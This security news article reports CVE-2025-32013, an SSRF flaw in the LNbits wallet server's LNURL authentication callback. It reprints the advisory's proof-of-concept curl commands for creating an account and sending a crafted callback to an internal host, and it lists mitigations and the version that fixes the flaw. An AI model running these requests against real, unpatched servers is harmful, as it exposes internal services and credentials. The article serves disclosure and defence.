LNbits, the modular and extendable Lightning Network wallet server, has patched a critical Server-Side Request Forgery (SSRF) vulnerability that exposed internal services to potential exploitation via manipulated LNURL authentication flows. Tracked as CVE-2025-32013, the flaw carries a severity score of CVSSv4 9.3, indicating a high risk of impact on systems using vulnerable versions.
LNbits is widely used by developers, merchants, and Lightning enthusiasts to create scalable wallets, test extensions, and integrate Lightning functionality across various applications. But as the platform gains popularity, so do the risks of misconfigured or vulnerable features.
The vulnerability resides in the way LNbits handles LNURL authentication callback parameters. When a user authenticates via LNURL, LNbits makes an HTTP request to the callback URL provided by the user. However, the platform fails to validate whether that URL is safe or points to external versus internal resources.
βThe application doesnβt properly validate the callback URL, allowing attackers to specify internal network addresses and access internal resources.β β LNbits Security Advisory explains.
As a result, attackers can craft LNURL auth requests that cause LNbits to initiate requests to sensitive internal IP addresses (e.g., http://localhost, http://192.168.0.1), enabling unauthorized access to private endpoints, metadata, internal tools, or even file content.
The attack involves just two steps:
Create a new wallet account to get an admin key:curl -X POST http://target:5000/api/v1/account -d '{"name":"test"}'Use the obtained admin key to send a crafted LNURL authentication request:curl -X POST http://target:5000/api/v1/lnurlauth \ -H "X-Api-Key: <admin_key>" \ -H "Content-Type: application/json" \ -d '{ "callback": "http://target-internal-server/?tag=login&k1=9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08", "k1": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08", "sig": "0"*128, "key": "0"*64 }'The LNbits server will follow the attacker-supplied callback URL β even if it points to an internal host or local IP β and return its contents in the HTTP response.
βThe vulnerability can be used to read internal files, access internal services, and potentially expose sensitive information from the internal network.β
While authentication is required to exploit this vulnerability, any user with wallet creation access can escalate the attack. This means that multi-user LNbits deployments, particularly those accessible over the internet, are at significant risk.
Misuse could lead to:
Leaked internal API documentationAccess to configuration metadataCredential or token exposureReconnaissance for lateral movement inside cloud or local networksAll LNbits users are urged to upgrade to version 1.0.0 or higher to avoid exposure.
The LNbits team advises the following defenses:
Validate Callback URLs: Ensure only trusted domains or IP ranges are permitted.Use Whitelisting: Only allow URLs from known-safe networks.Disable Redirects: Prevent the system from blindly following redirects in callback responses.Use Secure Proxies: Route requests through gateways that filter out access to internal services.